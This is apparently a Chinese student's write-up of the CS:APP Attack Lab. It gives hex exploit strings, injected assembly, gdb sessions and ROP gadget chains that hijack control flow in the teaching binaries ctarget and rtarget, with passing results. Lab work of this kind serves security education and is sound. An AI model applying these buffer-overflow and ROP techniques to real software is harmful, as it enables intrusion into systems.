使用objdump -d ctarget > ctarget.dis
输入命令cat exploit1.txt | ./hex2raw | ./ctarget -q
Cookie: 0x59b997fa
Type string:Touch1!: You called touch1()
Valid solution for level 1 with target ctarget
PASS: Would have posted the following:
user id bovik
course 15213-f15
lab attacklab
result 1:PASS:0xffffffff:ctarget:1:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 C0 17 40 00 00
void touch2(unsigned val){
vlevel = 2;
if (val == cookie){
printf("Touch2!: You called touch2(0x%.8x)\n", val);
} else {
printf("Misfire: You called touch2(0x%.8x)\n", val);
movq $0x59b997fa,%rdi /* 0x59b997fa是本次实验的cookie值 */
push $0x4017ec /* 把touch2的首地址压栈 */
ret /* 使用ret指令,把控制流跳转到函数touch2中 */
gcc -c jmp_touch2.s
objdump -d jmp_touch2.o > jmp_touch2.dis
根据 jmp_touch2.dis,可写出攻击代码,并保存为exploit2.txt 文件。
(gdb) d
Delete all breakpoints? (y or n) Please answer y or n.
Delete all breakpoints? (y or n) y
(gdb) b test
Breakpoint 7 at 0x401968: file visible.c, line 90.
(gdb) r -q
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/paul/csapp_homework/attacklab/ctarget -q
Cookie: 0x59b997fa
Breakpoint 7, test () at visible.c:90
90 in visible.c
(gdb) i f
Stack level 0, frame at 0x5561dcb8:
rip = 0x401968 in test (visible.c:90); saved rip 0x401f24
called by frame at 0x55685ff8
source language c.
Arglist at 0x5561dca8, args:
Locals at 0x5561dca8, Previous frame's sp is 0x5561dcb8
Saved registers:
rip at 0x5561dcb0
(gdb) p/x 0x5561dca8-24
$20 = 0x5561dc90
cat exploit2.txt | ./hex2raw | ./ctarget -q
Cookie: 0x59b997fa
Type string:Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target ctarget
PASS: Would have posted the following:
user id bovik
course 15213-f15
lab attacklab
result 1:PASS:0xffffffff:ctarget:2:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 C7 C7 FA 97 B9 59 68 EC 17 40 00 C3 00 00 00 90 DC 61 55 00 00 00 00
其中详细解释见info frame含义解释。可知函数test输入参数所在的内存地址为0x5561dca8
在touch3函数中调用了hexmatch函数,这个函数的功能是匹配cookie和传进来的字符是否匹配。在本文中cookie的值是0x59b997fa,所以我们传进去的参数应该是"59b997fa",(即 35 39 62 39 39 37 66 61 00
movq $0x5561dca8,%rdi /* 指向字符串的首地址 */
push $0x4018fa /* touch3首地址 */
$ cat exploit3.txt | ./hex2raw | ./ctarget -q
Cookie: 0x59b997fa
Type string:Touch3!: You called touch3(“59b997fa”)
Valid solution for level 3 with target ctarget
PASS: Would have posted the following:
user id bovik
course 15213-f15
lab attacklab
result 1:PASS:0xffffffff:ctarget:3:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 C7 C7 A8 DC 61 55 68 FA 18 40 00 C3 00 00 00 90 DC 61 55 00 00 00 00 35 39 62 39 39 37 66 61 00
这关用ROP攻击touch2函数。实验要求只能使用movq 、popq、 ret、 nop
0000000000401994 <start_farm>:
401994: b8 01 00 00 00 mov $0x1,%eax
401999: c3 retq
000000000040199a <getval_142>:
40199a: b8 fb 78 90 90 mov $0x909078fb,%eax
40199f: c3 retq
00000000004019a0 <addval_273>:
4019a0: 8d 87 48 89 c7 c3 lea -0x3c3876b8(%rdi),%eax
4019a6: c3 retq
00000000004019a7 <addval_219>:
4019a7: 8d 87 51 73 58 90 lea -0x6fa78caf(%rdi),%eax
4019ad: c3 retq
00000000004019ae <setval_237>:
4019ae: c7 07 48 89 c7 c7 movl $0xc7c78948,(%rdi)
4019b4: c3 retq
00000000004019b5 <setval_424>:
4019b5: c7 07 54 c2 58 92 movl $0x9258c254,(%rdi)
4019bb: c3 retq
00000000004019bc <setval_470>:
4019bc: c7 07 63 48 8d c7 movl $0xc78d4863,(%rdi)
4019c2: c3 retq
00000000004019c3 <setval_426>:
4019c3: c7 07 48 89 c7 90 movl $0x90c78948,(%rdi)
4019c9: c3 retq
00000000004019ca <getval_280>:
4019ca: b8 29 58 90 c3 mov $0xc3905829,%eax
4019cf: c3 retq
00000000004019d0 <mid_farm>:
4019d0: b8 01 00 00 00 mov $0x1,%eax
4019d5: c3
查实验手册知,movq S, D的机器码以48 89
开头,movl S, D机器码以89
popq %rax /* 58 */
movq %rax,%rdi /* 48 89 c7 */
ret /* c3 */
针对popq %rax
00000000004019a7 <addval_219>:
4019a7: 8d 87 51 73 58 90 lea -0x6fa78caf(%rdi),%eax
4019ad: c3 retq
针对movq %rax,%rdi
00000000004019c3 <setval_426>:
4019c3: c7 07 48 89 c7 90 movl $0x90c78948,(%rdi)
4019c9: c3 retq
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 /* 缓冲区溢出 */
ab 19 40 00 00 00 00 00 /* 覆盖原先的返回值,跳转执行popq %rax;ret;指令 */
fa 97 b9 59 00 00 00 00 /* cookie值 */
c5 19 40 00 00 00 00 00 /* 指向movq %rax,%rdi;ret指令地址 */
ec 17 40 00 00 00 00 00 /* touch2 */
使用命令cat exploit4.txt | ./hex2raw | ./rtarget -q
Cookie: 0x59b997fa
Type string:Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target rtarget
PASS: Would have posted the following:
user id bovik
course 15213-f15
lab attacklab
result 1:PASS:0xffffffff:rtarget:2:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CC 19 40 00 00 00 00 00 FA 97 B9 59 00 00 00 00 C5 19 40 00 00 00 00 00 EC 17 40 00 00 00 00 00
0000000000401994 <start_farm>:
401994: b8 01 00 00 00 mov $0x1,%eax
401999: c3 retq
000000000040199a <getval_142>:
40199a: b8 fb 78 90 90 mov $0x909078fb,%eax
40199f: c3 retq
00000000004019a0 <addval_273>:
4019a0: 8d 87 48 89 c7 c3 lea -0x3c3876b8(%rdi),%eax
4019a6: c3 retq
00000000004019a7 <addval_219>:
4019a7: 8d 87 51 73 58 90 lea -0x6fa78caf(%rdi),%eax
4019ad: c3 retq
00000000004019ae <setval_237>:
4019ae: c7 07 48 89 c7 c7 movl $0xc7c78948,(%rdi)
4019b4: c3 retq
00000000004019b5 <setval_424>:
4019b5: c7 07 54 c2 58 92 movl $0x9258c254,(%rdi)
4019bb: c3 retq
00000000004019bc <setval_470>:
4019bc: c7 07 63 48 8d c7 movl $0xc78d4863,(%rdi)
4019c2: c3 retq
00000000004019c3 <setval_426>:
4019c3: c7 07 48 89 c7 90 movl $0x90c78948,(%rdi)
4019c9: c3 retq
00000000004019ca <getval_280>:
4019ca: b8 29 58 90 c3 mov $0xc3905829,%eax
4019cf: c3 retq
00000000004019d0 <mid_farm>:
4019d0: b8 01 00 00 00 mov $0x1,%eax
4019d5: c3 retq
00000000004019d6 <add_xy>:
4019d6: 48 8d 04 37 lea (%rdi,%rsi,1),%rax
4019da: c3 retq
00000000004019db <getval_481>:
4019db: b8 5c 89 c2 90 mov $0x90c2895c,%eax
4019e0: c3 retq
00000000004019e1 <setval_296>:
4019e1: c7 07 99 d1 90 90 movl $0x9090d199,(%rdi)
4019e7: c3 retq
00000000004019e8 <addval_113>:
4019e8: 8d 87 89 ce 78 c9 lea -0x36873177(%rdi),%eax
4019ee: c3 retq
00000000004019ef <addval_490>:
4019ef: 8d 87 8d d1 20 db lea -0x24df2e73(%rdi),%eax
4019f5: c3 retq
00000000004019f6 <getval_226>:
4019f6: b8 89 d1 48 c0 mov $0xc048d189,%eax
4019fb: c3 retq
00000000004019fc <setval_384>:
4019fc: c7 07 81 d1 84 c0 movl $0xc084d181,(%rdi)
401a02: c3 retq
0000000000401a03 <addval_190>:
401a03: 8d 87 41 48 89 e0 lea -0x1f76b7bf(%rdi),%eax
401a09: c3 retq
0000000000401a0a <setval_276>:
401a0a: c7 07 88 c2 08 c9 movl $0xc908c288,(%rdi)
401a10: c3 retq
0000000000401a11 <addval_436>:
401a11: 8d 87 89 ce 90 90 lea -0x6f6f3177(%rdi),%eax
401a17: c3 retq
0000000000401a18 <getval_345>:
401a18: b8 48 89 e0 c1 mov $0xc1e08948,%eax
401a1d: c3 retq
0000000000401a1e <addval_479>:
401a1e: 8d 87 89 c2 00 c9 lea -0x36ff3d77(%rdi),%eax
401a24: c3 retq
0000000000401a25 <addval_187>:
401a25: 8d 87 89 ce 38 c0 lea -0x3fc73177(%rdi),%eax
401a2b: c3 retq
0000000000401a2c <setval_248>:
401a2c: c7 07 81 ce 08 db movl $0xdb08ce81,(%rdi)
401a32: c3 retq
0000000000401a33 <getval_159>:
401a33: b8 89 d1 38 c9 mov $0xc938d189,%eax
401a38: c3 retq
0000000000401a39 <addval_110>:
401a39: 8d 87 c8 89 e0 c3 lea -0x3c1f7638(%rdi),%eax
401a3f: c3 retq
0000000000401a40 <addval_487>:
401a40: 8d 87 89 c2 84 c0 lea -0x3f7b3d77(%rdi),%eax
401a46: c3 retq
0000000000401a47 <addval_201>:
401a47: 8d 87 48 89 e0 c7 lea -0x381f76b8(%rdi),%eax
401a4d: c3 retq
0000000000401a4e <getval_272>:
401a4e: b8 99 d1 08 d2 mov $0xd208d199,%eax
401a53: c3 retq
0000000000401a54 <getval_155>:
401a54: b8 89 c2 c4 c9 mov $0xc9c4c289,%eax
401a59: c3 retq
0000000000401a5a <setval_299>:
401a5a: c7 07 48 89 e0 91 movl $0x91e08948,(%rdi)
401a60: c3 retq
0000000000401a61 <addval_404>:
401a61: 8d 87 89 ce 92 c3 lea -0x3c6d3177(%rdi),%eax
401a67: c3 retq
0000000000401a68 <getval_311>:
401a68: b8 89 d1 08 db mov $0xdb08d189,%eax
401a6d: c3 retq
0000000000401a6e <setval_167>:
401a6e: c7 07 89 d1 91 c3 movl $0xc391d189,(%rdi)
401a74: c3 retq
0000000000401a75 <setval_328>:
401a75: c7 07 81 c2 38 d2 movl $0xd238c281,(%rdi)
401a7b: c3 retq
0000000000401a7c <setval_450>:
401a7c: c7 07 09 ce 08 c9 movl $0xc908ce09,(%rdi)
401a82: c3 retq
0000000000401a83 <addval_358>:
401a83: 8d 87 08 89 e0 90 lea -0x6f1f76f8(%rdi),%eax
401a89: c3 retq
0000000000401a8a <addval_124>:
401a8a: 8d 87 89 c2 c7 3c lea 0x3cc7c289(%rdi),%eax
401a90: c3 retq
0000000000401a91 <getval_169>:
401a91: b8 88 ce 20 c0 mov $0xc020ce88,%eax
401a96: c3 retq
0000000000401a97 <setval_181>:
401a97: c7 07 48 89 e0 c2 movl $0xc2e08948,(%rdi)
401a9d: c3 retq
0000000000401a9e <addval_184>:
401a9e: 8d 87 89 c2 60 d2 lea -0x2d9f3d77(%rdi),%eax
401aa4: c3 retq
0000000000401aa5 <getval_472>:
401aa5: b8 8d ce 20 d2 mov $0xd220ce8d,%eax
401aaa: c3 retq
0000000000401aab <setval_350>:
401aab: c7 07 48 89 e0 90 movl $0x90e08948,(%rdi)
401ab1: c3 retq
0000000000401ab2 <end_farm>:
401ab2: b8 01 00 00 00 mov $0x1,%eax
401ab7: c3 retq
401ab8: 90 nop
401ab9: 90 nop
401aba: 90 nop
401abb: 90 nop
401abc: 90 nop
401abd: 90 nop
401abe: 90 nop
401abf: 90 nop
首先要以一种巧妙的方法引入字符串的地址,从上述代码中找到了一行gadgets,即4019d6: 48 8d 04 37 lea (%rdi,%rsi,1),%rax
movq %rsp,%rax /* 机器码为:0x48 89 e0 */
0000000000401a03 <addval_190>:
401a03: 8d 87 41 48 89 e0 lea -0x1f76b7bf(%rdi),%eax
401a09: c3 retq
2)movq %rax,%rdi
(机器码为:0x48 89 c7)
00000000004019c3 <setval_426>:
4019c3: c7 07 48 89 c7 90 movl $0x90c78948,(%rdi)
4019c9: c3 retq
3) popq %rax
00000000004019ca <getval_280>:
4019ca: b8 29 58 90 c3 mov $0xc3905829,%eax
4019cf: c3 retq
4)movl %eax,%edx
(机器码为:0x89 c2 )
00000000004019db <getval_481>:
4019db: b8 5c 89 c2 90 mov $0x90c2895c,%eax
4019e0: c3 retq
5)movl %edx,%ecx
(机器码为:0x89 d1)
0000000000401a68 <getval_311>:
401a68: b8 89 d1 08 db mov $0xdb08d189,%eax
401a6d: c3 retq
6)movl %ecx,%esi
(机器码为:0x89 ce )
0000000000401a11 <addval_436>:
401a11: 8d 87 89 ce 90 90 lea -0x6f6f3177(%rdi),%eax
401a17: c3 retq
7)lea (%rdi,%rsi,1),%rax
00000000004019d6 <add_xy>:
4019d6: 48 8d 04 37 lea (%rdi,%rsi,1),%rax
4019da: c3 retq
8)movq %rax,%rdi
(机器码为:0x48 89 c7)
00000000004019c3 <setval_426>:
4019c3: c7 07 48 89 c7 90 movl $0x90c78948,(%rdi)
4019c9: c3 retq
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 /* 缓冲区溢出 */
06 1a 40 00 00 00 00 00 /* 覆盖原先的返回值,跳转执行movq %rsp,%rax */
c5 19 40 00 00 00 00 00 /* movq %rax,%rdi */
cc 19 40 00 00 00 00 00 /* popq %rax */
48 00 00 00 00 00 00 00 /* 偏移量 9*8=72字节 */
dd 19 40 00 00 00 00 00 /* movl %eax,%edx */
69 1a 40 00 00 00 00 00 /* movl %edx,%ecx */
13 1a 40 00 00 00 00 00 /* movl %ecx,%esi */
d6 19 40 00 00 00 00 00 /* lea (%rdi,%rsi,1),%rax */
c5 19 40 00 00 00 00 00 /* movq %rax,%rdi */
fa 18 40 00 00 00 00 00 /* touch3 */
35 39 62 39 39 37 66 61 /* touch3的输入字符串 */
00 00 00 00 00 00 00 00
Cookie: 0x59b997fa Type string:Touch3!: You called touch3(“59b997fa”)
Valid solution for level 3 with target rtarget PASS: Would have posted
the following: user id bovik course 15213-f15 lab attacklab
result 1:PASS:0xffffffff:rtarget:3:00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 06 1A 40 00 00 00 00 00 C5 19 40 00 00 00 00 00 CC
19 40 00 00 00 00 00 48 00 00 00 00 00 00 00 DD 19 40 00 00 00 00 00
69 1A 40 00 00 00 00 00 13 1A 40 00 00 00 00 00 D6 19 40 00 00 00 00
00 C5 19 40 00 00 00 00 00 FA 18 40 00 00 00 00 00 35 39 62 39 39 37
66 61 00 00 00 00 00 00 00 00